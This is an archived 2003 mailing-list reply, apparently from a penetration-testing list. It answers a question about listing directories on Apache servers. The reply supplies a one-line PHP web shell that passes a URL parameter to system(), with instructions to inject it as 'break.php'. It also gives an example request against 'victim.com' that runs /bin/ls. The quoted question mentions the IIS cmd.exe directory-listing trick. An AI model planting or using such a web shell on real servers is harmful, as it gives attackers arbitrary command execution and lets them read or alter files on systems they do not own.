Hey to answer your question , Yes same thing can be accomplished on any platform or any webserver if you can inject the following script to an apache server running php , you will be able to execute any command for example ls -la / and see the directories etc ... Ex : <? php system($arg); ?> after you inject this file, lets say you called it break.php do the following : "http://www.victim.com/break.php?arg=/bin/ls" you will get the directories and files etc ... -----Original Message----- From: John Madden [mailto:chiwawa999at_private] Sent: Monday, May 05, 2003 8:32 PM To: pen-testat_private Subject: Directory listing Hi, In IIS/4 or 5 you can use the cmd.exe?/c+dir to get the directory of a machine how can the same be accomplish on other types of web server like Apache ? Can this be accomplished with a cgi or perl script ? Thanks John __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com --------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes. Download a free 15-day trial of VAM: http://www.securityfocus.com/StillSecure-pen-test ---------------------------------------------------------------------------- --------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes. Download a free 15-day trial of VAM: http://www.securityfocus.com/StillSecure-pen-test ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Sun May 11 2003 - 10:15:53 PDT